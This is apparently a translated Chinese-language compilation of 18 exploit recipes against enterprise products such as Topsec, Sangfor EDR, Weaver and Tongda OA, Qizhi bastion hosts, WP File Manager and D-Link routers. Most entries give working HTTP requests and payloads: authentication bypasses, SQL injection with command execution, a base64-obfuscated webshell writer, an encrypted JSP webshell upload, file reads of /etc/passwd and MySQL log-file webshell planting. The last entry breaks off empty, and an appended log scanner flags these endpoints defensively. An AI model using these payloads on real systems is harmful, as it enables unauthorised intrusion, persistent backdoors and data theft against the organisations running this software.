1、Topsec (天融信) Data Leak Prevention system: unauthorized modification of the administrator password
No login is required. The password-change function does not verify the old password, and the /?module=auth_user&action=mod_edit_pwd interface can be reached without authorization, so any user's password can be changed directly. Note: the default superman account has uid 1.
POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
2、NSFOCUS (绿盟) UTS Unified Threat Sensor: arbitrary administrator login
Modify the response packet: changing false to true leaks the MD5 password hash of the admin user.
Use the leaked MD5 hash at the login page to log in.
3、Topsec (天融信) TopApp-LB load balancer: SQL injection
POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr(‘a’,1,1),11,12,13,14,15,16,17,18,19,20,21,22—+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
4、Yonyou (用友) GRP-U8: SQL injection
POST /Proxy HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
5、BT (宝塔) panel: Nginx parsing vulnerability
Locally, write a file containing
<?php phpinfo(); ?>
and save it with a .jpg extension.
Upload the file directly; no modification is needed:
Visit the URL of the uploaded file:
Append /.php after upload/1.jpg
6、Sangfor (深信服) EDR: remote code execution
Bypass: {“params”:”w=123\”‘1234123’\”|命令”}
The result is as follows:
Response:
7、Qizhi (齐治) bastion host: pre-authentication remote command execution
Qizhi bastion host pre-authentication remote command execution (CNVD-2019-20835)
Unauthenticated; no login required.
1、Visit http://10.20.10.11/listener/cluster_manage.php : it returns “OK”.
2、Visiting the following link gets a shell; on success a one-line PHP webshell is written.
3、/var/www/shterm/resources/qrcode/lbj77.php, password 10086
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
8、Weaver (泛微) OA e-Bridge: arbitrary file read
Unauthenticated arbitrary file read:
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*
9、BT (宝塔) panel: phpMyAdmin unauthorized access
A while ago the BT database panel issue (unauthorized access, no login required) went viral in WeChat Moments and groups; the affected versions are listed below.
1、The BT panel's default phpMyAdmin port is 888, and checking for this vulnerability is extremely simple: 172.10.0.121:888/pma
2、If the BT panel is an affected version, the phpMyAdmin panel page appears directly.
10、Exchange Server: remote code execution
Microsoft's advisory is explicit: with just one Exchange user account, arbitrary commands can be executed on the Exchange server.
https://srcincite.io/pocs/cve-2020-16875.py.txt
https://srcincite.io/pocs/cve-2020-16875.ps1.txt
researcher@incite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass> <cmd>
(+) eg: ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint
researcher@incite:~$ ./poc.py 192.168.75.142 harrym@exchangedemo.com:user123### mspaint
(+) logged in as harrym@exchangedemo.com
(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5
(+) triggered rce as SYSTEM!
11、PhpStudy: nginx parsing vulnerability
1、The only prerequisite is to upload a malicious PHP file (OSS does not count!) to the server.
<?php phpinfo();?>
2、Access the uploaded image via /x.txt/x.php and, bang, the PHP code is parsed.
12、Sangfor (深信服) EDR: backend arbitrary user login
Payload
/ui/login.php?user=username
Simply enter the payload above and the login is bypassed:
https://127.0.0.1:9443/ui/login.php?user=username
The backend login is bypassed successfully.
13、Sangfor (深信服) EDR: remote command execution, CNVD-2020-46552
An attacker can exploit this vulnerability by crafting an HTTP request; successful exploitation allows arbitrary command execution on the target host. The China National Vulnerability Database (CNVD) recorded the vulnerability on August 18 and rated it “High”; the affected versions are v3.2.16-19.
1) Construct the payload; the vulnerable file is c.php and the vulnerable parameter is host
/tool/log/c.php?strip_slashes=system&host=id
2) Commands run with root privileges
14、WordPress plugin WP File Manager: 0day vulnerability
Visit this file: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
It returns JSON.
Step 1: send the following GET request
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=1.php&target=l1_Lw
Step 2: POST the packet below to this address
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
POST body:
cmd=put&target=l1_MS5waHA%3D&content=马内容
The webshell is then created in this directory:
https://www.xxx.com/wp-content/plugins/wp-file-manager/lib/files/1.php
There are actually very few exploitable machines on the internet; I hope everyone can share better search syntax that finds this kind of machine directly.
15、D-Link DIR-645 service.cgi: remote command execution
POST /service.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.1/
Content-Length: 17
Cookie: uid=NDRCRN78JY

EVENT=pwd%3bls%26
16、Leagsoft (联软科技) products: arbitrary file upload and command execution
POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--
17、Tongda (通达) OA v11.7: backend SQL injection to RCE
Add a user:
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
This user then has all privileges on the mysql database; next, grant yourself the privileges:
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
Then use the injection point to flush privileges, because this user does not have the privilege to flush privileges itself: general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
If you get this prompt, or the password simply cannot be changed, run the following once more:
grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
Find the path: select @@basedir; # c:\td0a117\mysql5\, so the web root is c:\td0a117\webroot\
Method 1:
set global slow_query_log=on;
set global slow_query_log_file='C:/td0a117/webroot/tony.php';
select '<?php eval($_POST[x]);?>' or sleep(11);
Method 2:
set global general_log = on;
set global general_log_file = 'C:/td0a117/webroot/tony2.php';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';
18、Weaver (泛微) e-Bridge: another arbitrary file read and write vulnerability
The demonstration is shown below:
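As an added defender-side example (not part of the original post), the following Python routine scans web-server access-log lines for the request paths and parameters that the sections above describe, so that attempts against these endpoints can be flagged. The product labels and the sample log lines are constructed for this example; the path patterns are taken from the sections above.

```python
import re
from urllib.parse import unquote

# Request-path signatures taken from the sections above; labels are constructed.
# Each pattern is matched against the URL-decoded request path of a log entry.
SIGNATURES = [
    ("Topsec DLP unauth password change", r"module=auth_user&action=mod_edit_pwd"),
    ("Topsec TopApp-LB SQLi endpoint",    r"/acc/clsf/report/datasource\.php"),
    ("Qizhi bastion cluster_manage",      r"/listener/cluster_manage\.php"),
    ("Qizhi bastion ha_request install",  r"/ha_request\.php\?.*action=install"),
    ("Weaver e-Bridge file read",         r"/wxjsapi/saveYZJFile\?.*downloadUrl=file:"),
    ("Sangfor EDR c.php RCE",             r"/tool/log/c\.php\?.*strip_slashes="),
    ("Sangfor EDR login bypass",          r"/ui/login\.php\?user="),
    ("WP File Manager connector",         r"/wp-file-manager/lib/php/connector\.minimal\.php"),
    ("Tongda OA delete_cascade SQLi",     r"/delete_cascade\.php\?.*condition_cascade="),
]
COMPILED = [(label, re.compile(p, re.IGNORECASE)) for label, p in SIGNATURES]

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def scan_log(lines):
    """Return (line_number, client_ip, label, status) for every line hitting a signature."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        path = unquote(m.group("path"))  # decode %3A etc. so encoded variants still match
        for label, rx in COMPILED:
            if rx.search(path):
                hits.append((n, m.group("ip"), label, int(m.group("status"))))
                break  # one label per line is enough for triage
    return hits

# Constructed sample log lines (not real traffic); the first and last are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2020:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2020:10:00:02 +0800] "POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Oct/2020:10:00:03 +0800] "GET /wxjsapi/saveYZJFile?fileName=t&downloadUrl=file%3A///etc/passwd&fileExt=txt HTTP/1.1" 200 1340',
    '10.0.0.9 - - [01/Oct/2020:10:00:04 +0800] "GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1" 200 40',
    '10.0.0.9 - - [01/Oct/2020:10:00:05 +0800] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=1.php&target=l1_Lw HTTP/1.1" 200 60',
    '10.0.0.7 - - [01/Oct/2020:10:00:06 +0800] "GET /wp-content/uploads/a.jpg HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s (HTTP %d)" % hit)
```

A 200 status on a flagged line is the case worth investigating first, since it indicates the endpoint answered rather than rejected the request.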